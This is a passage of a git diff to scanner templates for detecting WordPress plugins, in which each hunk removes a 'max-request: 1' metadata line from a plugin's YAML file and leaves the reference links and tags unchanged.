a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index 96c813ad49..c9859e9770 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-google-fonts/ metadata: - max-request: 1 plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 23a88ea130..88d38e21ed 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 